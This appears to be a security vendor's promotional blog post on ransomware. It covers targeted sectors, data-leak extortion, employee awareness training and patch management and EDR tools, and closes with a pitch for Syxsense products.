Botnets can — and have — shut down large portions of the global internet due to their raw power, making them perhaps the most frightening ransomware threat vector. (That said, the average ransomware attack is more precisely targeted than the blitzkrieg approach of a large botnet would allow.)

Organizations of all kinds across the public and private sectors have found themselves the victims of ransomware. But throughout the late-2010s heyday of this cyberattack type, state and local government offices were targeted with particular frequency. In many cases, this was due to under-protected or outdated IT infrastructure that was easier to breach.

Due to the sensitivity (and volume) of information these bodies hold in their records, they will most likely remain common ransomware victims for the foreseeable future. On the private-sector side of things, energy sector firms and healthcare organizations — especially the latter — have often been similarly attacked and will continue to be targeted in 2020 and the years to come.

As stated, ransomware usually works by encrypting or walling off data, or bringing an infected machine (or network) to a halt through a denial of service. However, in some recent cases, cyberattackers have used the exploits in their ransomware deployments to steal data from businesses and leak it — or threaten to do so — to add further heft to their monetary demands, according to ZDNet. Organizations must be prepared for all of the worst-case scenarios that can accompany a ransomware attack.

The Personal Side of Ransomware Mitigation & Response

Most people are at least somewhat aware of ransomware by now. But that doesn’t necessarily mean the average employee of a given organization is trained to be cyberattack-wary in a manner that genuinely minimizes their likelihood of being hit with such an attack or provides them the skills to deal with it.

According to the results of the Chubb 2019 Cyber Risk Survey, only 31% of organizations offer company-wide training to bolster staff awareness of cyberthreats. Because of this, it’s hard to fault workers for falling prey to well-disguised ransomware scams.

The Infosec Institute pointed out that regular cybersecurity awareness training, once implemented, can be a significant aid to organizations’ efforts to reduce their overall levels of vulnerability to ransomware and other potentially devastating attacks. Experts noted that it can be particularly effective to engage employees in such training exercises on a monthly basis.

Framing these initiatives through the lens of gamification — e.g., conducting simulated social engineering and ransomware attacks and offering prizes to those who respond to the mock threats properly — can further galvanize workers’ enthusiasm for and commitment to cybersecurity. This can lead to a significant decrease in staff members falling prey to the phishing, pretexting and other social engineering scams that often precede ransomware infection.

Choosing the Proper Tools

Training and increased awareness alone will not be sufficient to substantially mitigate the dangers that ransomware poses to countless organizations. It’ll also be necessary to find and implement a number of more concrete tools equipped to detect and repel or quarantine these cyberattacks.

If you already have an antivirus software solution in place, there’s a strong chance that it won’t be equipped to deal with contemporary ransomware threats unless the program is brand new. And most of the antivirus software that does work on ransomware is specifically focused on detecting and preventing ransomware rather than other attack vectors.

Also, as often as not, businesses that haven’t been previously targeted by cyberattacks of any kind will have let their cybersecurity measures fall out of date — and such lax awareness, on its own, can be enough to facilitate a ransomware intrusion, as the WannaCry debacle proved.

Instead, it may be best for your organization to use a multifaceted approach that includes not only employee training, firewalls and antivirus tools but also solutions for patch management and endpoint detection and response. As businesses integrate themselves further into the IoT landscape, their endpoint numbers will skyrocket, presenting that many more potential entry points for attackers, so it’s critical to protect them at all costs.

Syxsense offers comprehensive EDR software and patch management platforms along with always-available managed services from our support team. To dive deeper into the possibilities of our products, consider a free trial today.
